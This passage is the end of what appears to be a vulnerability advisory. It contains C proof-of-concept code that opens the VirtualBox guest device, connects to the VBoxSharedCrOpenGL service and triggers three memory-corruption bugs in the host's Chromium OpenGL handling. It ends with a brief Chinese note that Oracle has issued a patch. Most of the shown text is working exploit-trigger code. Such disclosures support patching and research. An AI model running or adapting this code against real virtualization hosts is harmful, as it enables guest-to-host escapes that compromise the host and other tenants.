if (!rc){
printf("ERROR: DeviceIoControl failed in function
trigger_opcode_0xea()! LastError: %d\n", GetLastError());
exit(EXIT_FAILURE);
}
if (parms.hdr.result == VINF_SUCCESS){
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
}
else{
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
exit(EXIT_FAILURE);
}
}
void poc(int option){
HANDLE hDevice;
uint32_t u32ClientID;
/* Connect to the VBoxSharedCrOpenGL service */
hDevice = open_device();
u32ClientID = do_connect(hDevice);
/* Set version and PID */
set_version(hDevice, u32ClientID);
set_pid(hDevice, u32ClientID);
switch (option){
case 1:
printf("[1] triggering the first bug...\n");
trigger_message_readback(hDevice, u32ClientID);
break;
case 2:
printf("[2] triggering the second bug...\n");
trigger_message_writeback(hDevice, u32ClientID);
break;
case 3:
printf("[3] triggering the third bug...\n");
trigger_opcode_0xea(hDevice, u32ClientID);
break;
default:
printf("[!] Unknown option %d.\n", option);
}
/* Disconnect from the VBoxSharedCrOpenGL service */
do_disconnect(hDevice, u32ClientID);
CloseHandle(hDevice);
}
int main(int argc, char* argv[])
{
if (argc < 2){
printf("Usage: %s <option number>\n\n", argv[0]);
printf("* Option 1: trigger the vulnerability in the
crNetRecvReadback function.\n");
printf("* Option 2: trigger the vulnerability in the
crNetRecvWriteback function.\n");
printf("* Option 3: trigger the vulnerability in the
crServerDispatchVertexAttrib4NubARB function.\n");
exit(1);
}
poc(atoi(argv[1]));
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: